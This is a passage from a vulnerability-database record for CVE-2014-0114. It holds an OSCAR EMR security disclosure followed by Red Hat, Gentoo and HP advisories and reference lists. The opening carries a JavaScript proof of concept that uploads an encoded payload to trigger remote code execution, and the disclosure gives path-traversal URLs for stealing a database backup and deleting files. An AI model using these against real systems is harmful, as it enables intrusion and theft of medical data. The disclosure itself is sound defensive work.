=\natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\");\nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));\nfor(var i = 0; i \u003c binaryArray.length; i++) {\n binaryArray[i] = decodedBase64.charCodeAt(i);\n}\nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"});\nvar formData = new FormData();\nformData.append(\"file\", payload);\nformData.append(\"submit\", \"Generate\");\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\");\nxhr.send(formData);\n\nXSS was not a focus of this test; other confirmed or likely XSS\nvulnerabilities are:\n* Reflected XSS through the errormsg parameter in loginfailed.jsp\n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp\n* Reflected XSS through the noteId parameter, line 1562 in\nCaseManagementViewAction (untested)\n* Reflected XSS through the pdfName parameter when an exception has\nbeen thrown, line 1174 in ManageDocumentAction (untested)\n* Reflected XSS through the pharmaName and pharmaFax parameters, line\n149 in FrmCustomedPDFServlet (untested)\n* Reflected XSS through the id and followupValue parameters, line 81\nin EctAddShortMeasurementAction (untested)\n\n=== OVE-20160329-0007: SQL injection ===\n\nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is\nconcatenated into an SQL statement rather than parameterized; likewise\nthe content parameter on lines 217, 223, and 229 of\nadmin/logReport.jsp. In both cases these errors result in error-based\nSQL injection vulnerabilities; the former allows authenticated users\nwith access to oscarMDS/PatientSearch.jsp to access information beyond\ntheir privilege levels while the latter is accessible only to\nadministrators. \n\n=== OVE-20160329-0008: Path traversal ===\n\nImportLogDownloadAction reads and outputs an arbitrary absolute file\npath provided by the user; DelImageAction deletes a user-specified\nfilename without accounting for the possibility of relative path\ntraversal (i.e., the inclusion of \"../\" in the filename). \n\nAny authenticated user can exploit the former issue to steal files\nfrom the system, e.g.,\n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz\n\nAn authenticated user with access to eforms can delete files writeable\nby the Tomcat user, e.g.,\n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp\n\n=== OVE-20160329-0002: Insecure direct object reference in document manager ===\n\nManageDocumentAction.display() does not check the permissions\nassociated with the requested document ID (doc_no) before providing it\nto the requesting user. Given\n/oscar/dms/ManageDocument.do?method=display\u0026doc_no=X\u0026providerNo=Y, a\nuser with access to the document management interface can view\narbitrary documents by incrementing or decrementing X, regardless of\nwhether they have been marked private. \n\n=== OVE-20160329-0005: Denial of service via resource exhaustion ===\n\nuploadSignature.jsp, which is accessible to and operable by\nunauthenticated users, saves uploaded files to a temporary directory\nbut never deletes them. An attacker can upload many junk files and\neventually consume all disk space available to the /tmp directory,\nimpeding access to the application depending on the functionality in\nquestion and the partition layout of the host system (the effects are\ncrippling and pervasive if /tmp is on the same partition as /; they\nare much less so if /tmp is on a separate partition). \n\n=== OVE-20160329-0006: Insecure password storage ===\n\nPasswords are stored as SHA-1 hashes; unless unusually complex,\npasswords stored in that manner are typically easily recoverable with\na tool such as oclHashcat. In OSCAR each hash is stored as a string of\ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat\nnon-traditional representation adds a bit of programming work to the\ncracking process, but does not represent a major impediment to attack. \n\n=== OVE-20160329-0009: Cross-site request forgery ===\n\nThe application lacks protection against cross-site request forgery\nattacks. A CSRF attack could be used against an administrator to\nexploit the deserialization RCE in a manner similar to the example\nprovided with OVE-20160329-0004. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: struts security update\nAdvisory ID: RHSA-2014:0474-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0474.html\nIssue date: 2014-05-07\nCVE Names: CVE-2014-0114 \n=====================================================================\n\n1. Summary:\n\nUpdated struts packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from the\nCVE link in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL Desktop Workstation (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64\n\n3. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n\n6. Package List:\n\nRHEL Desktop Workstation (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm\n\ni386:\nstruts-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm\n\nx86_64:\nstruts-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm\n\ni386:\nstruts-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm\n\nia64:\nstruts-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ia64.rpm\n\nppc:\nstruts-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ppc.rpm\n\ns390x:\nstruts-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.s390x.rpm\n\nx86_64:\nstruts-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0114.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTacDGXlSAg2UNWIIRAhvbAJ0Za5jRat54AcgbIdHKlzbZN1y1hACcC8DR\nHJqJt2S278nXdfwLyGc7EJQ=\n=qMuX\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Commons-BeanUtils: Arbitrary code execution\n Date: July 20, 2016\n Bugs: #534498\n ID: 201607-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nApache Commons BeanUtils does not properly suppress the class property,\nwhich could lead to the remote execution of arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Commons BeanUtils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/commons-beanutils-1.9.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0114\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to\nin the References section. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04311273\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04311273\nVersion: 1\n\nHPSBGN03041 rev.1 - HP IceWall Configuration Manager running Apache Struts,\nRemote Execution of Arbitrary Code\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-05-26\nLast Updated: 2014-05-26\n\nPotential Security Impact: Remote execution of arbitrary code\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP IceWall\nConfiguration Manager running Apache Struts. \n\nReferences: CVE-2014-0114, SSRT101566\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP IceWall Configuration Manager 3.0 running Apache Struts 1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-0114 (AV:N/AC:L/Au:S/C:P/I:P/A:P) 6.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided mitigation information to protect against potential risk to\nHP IceWall Configuration Manager running Apache Struts. \n\nMitigation information for the Apache Struts vulnerability (CVE-2014-0114) is\navailable at the following location:\n\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a\npplications/ba-p/6463188#.U2J7xeaSxro\n\nJapanese information is available at the following location:\n\nhttp://www.hp.com/jp/icewall_patchaccess\n\nNote: The HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 26 May 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0114"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "BID",
"id": "67121"
},
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "126811"
}
],
"trust": 3.24
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41690",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2014-0114",
"trust": 4.2
},
{
"db": "BID",
"id": "67121",
"trust": 1.9
},
{
"db": "JVN",
"id": "JVN30962312",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "59118",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59480",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59246",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "60177",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59479",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58710",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59718",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59430",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59464",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58851",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59228",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59704",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59014",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "57477",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "59245",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "58947",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "60703",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/07/08/1",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/06/15/10",
"trust": 1.6
},
{
"db": "ICS CERT",
"id": "ICSMA-20-184-01",
"trust": 1.4
},
{
"db": "HITACHI",
"id": "HS14-018",
"trust": 0.9
},
{
"db": "HITACHI",
"id": "HS14-020",
"trust": 0.9
},
{
"db": "JUNIPER",
"id": "JSA10643",
"trust": 0.9
},
{
"db": "JVN",
"id": "JVNVU96290700",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002308",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"trust": 0.8
},
{
"db": "CS-HELP",
"id": "SB2022072128",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1427",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.1089",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3134",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2355",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.0544",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.2568",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2293.2",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2014-0114",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126692",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149050",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126525",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137980",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154792",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126811",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "126811"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"id": "VAR-201404-0288",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4253262875
},
"last_update_date": "2026-03-09T21:53:46.914000Z",
"patch": {
"_id": null,
"data": [
{
"title": "OpenClinic\u00a0GA",
"trust": 0.8,
"url": "https://sourceforge.net/projects/open-clinic/"
},
{
"title": "BEANUTILS-463",
"trust": 0.8,
"url": "https://issues.apache.org/jira/browse/BEANUTILS-463"
},
{
"title": "Commons BeanUtils Package Version 1.9.2 Release Notes",
"trust": 0.8,
"url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt"
},
{
"title": "Impact of CVE-2014-0094 / CVE-2014-0114",
"trust": 0.8,
"url": "http://software.fujitsu.com/jp/security/vulnerabilities/cve2014-0094-0114.html"
},
{
"title": "Interstage Business Application Server, Interstage Application Server, Interstage Apworks, Interstage Studio, Interstage Application Framework Suite, Interstage Job Workload Server, Interstage Service Integrator: vulnerability in Struts (CVE-2014-0114)",
"trust": 0.8,
"url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_bas_201401.html"
},
{
"title": "Interstage Navigator Explorer Server: vulnerability in Struts (CVE-2014-0114)",
"trust": 0.8,
"url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_nes201401.html"
},
{
"title": "HS14-018",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-018/index.html"
},
{
"title": "HS14-020",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-020/index.html"
},
{
"title": "1676303",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
},
{
"title": "1676375",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"title": "1676931",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
},
{
"title": "1675523",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675523"
},
{
"title": "1678621",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678621"
},
{
"title": "1680848",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680848"
},
{
"title": "1680194",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194"
},
{
"title": "NTT DATA Corporation website",
"trust": 0.8,
"url": "http://www.nttdata.com/global/en/news-center/others/2014/052300.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - October 2014 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014verbose-1972962.html"
},
{
"title": "Oracle Critical Patch Update Advisory - October 2014",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
},
{
"title": "Oracle Critical Patch Update Advisory - January 2015",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html"
},
{
"title": "Oracle Critical Patch Update Advisory - July 2014",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - July 2014 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014verbose-1972958.html"
},
{
"title": "Does CVE-2014-0114 affect Struts 1 in Red Hat products?",
"trust": 0.8,
"url": "https://access.redhat.com/solutions/869353"
},
{
"title": "Bug 1116665",
"trust": 0.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
},
{
"title": "Bug 1091938",
"trust": 0.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
},
{
"title": "July 2014 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/july_2014_critical_patch_update"
},
{
"title": "October 2014 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/october_2014_critical_patch_update"
},
{
"title": "January 2015 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update"
},
{
"title": "TERASOLUNA Framework",
"trust": 0.8,
"url": "http://en.sourceforge.jp/projects/terasoluna/"
},
{
"title": "Apache Struts 1.2.9 with SP1 by NTT DATA",
"trust": 0.8,
"url": "http://en.sourceforge.jp/projects/terasoluna/wiki/StrutsPatch1-EN"
},
{
"title": "struts-1.2.9-4jpp.8.el5_10.src",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=49743"
},
{
"title": "Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192995 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=96f4091aa31a0ece729fdcb110066df5"
},
{
"title": "Red Hat: CVE-2014-0114",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0114"
},
{
"title": "Red Hat: Important: Fuse 7.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182669 - Security Advisory"
},
{
"title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f5bb2b180c7c77e5a02747a1f31830d9"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2019",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=81c63752a6f26433af2128b2e8c02385"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d"
},
{
"title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
